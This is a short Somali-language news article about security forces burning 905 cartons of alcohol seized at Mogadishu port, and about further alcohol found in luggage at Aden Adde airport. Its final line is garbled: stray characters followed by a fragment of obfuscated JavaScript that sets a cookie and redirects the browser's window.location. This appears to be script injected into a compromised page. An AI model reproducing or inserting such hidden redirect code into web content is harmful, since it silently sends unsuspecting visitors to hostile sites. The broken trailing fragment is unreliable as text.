Taliska ciidanka booliska Soomaaliya iyo masuuliyiin ka tirsan maamulka gobolka Banaadir ayaa Dekeda magaalada Muqdisho waxa ay ku soo bandhigeen Kunteenar Qamri ah oo ay gacanta ku dhigeen ciidamada amniga, laguna qabtay gudaha Dekedda.
Guddoomiye ku xigeenka arrimaha bulshada maamulka gobolka Banaadir Basma Caamir Shakeeti iyo agaasimaha caafimaadka dowladda hoose ayaa goobjoog ka ahaa halka lagu gubay Qamriga, laguna burburiyay.
Qamriga lagu qabtay Dekedda Muqdisho ayaa gaarayay 905 kartoon, saraakiisha ciidamada ammaanka ma aanu shaacin in gacanta lagu dhigay raggii Qamrigan lahaa.
Sidoo kale ciidamada ammaanka garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho ayaa qabtay Qamri kale oo isna lagu soo dhex qariyay Boorsooyin saarnaa diyaarado.
Dakadda Magaalada Muqdisho, ayaa dhawr mar sidaan oo kale waxaa loogu qabtay Qamri kala duwan oo ganacsato ay kala soo dageen Dakada, kuwaasi oo rabay in magaalada gudaheeda ay soo galiyaan.
Qamriga ayaa si caadi ah loogu iibiyaa meelo ka mid ah magaalada Muqdisho, sidoo kalena waxaa si aan gambad laheyn loogu cabaa Hoteelada magaalada, gaar ahaan kuwa ku dhaw Xeebta Liido.
A�A� 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}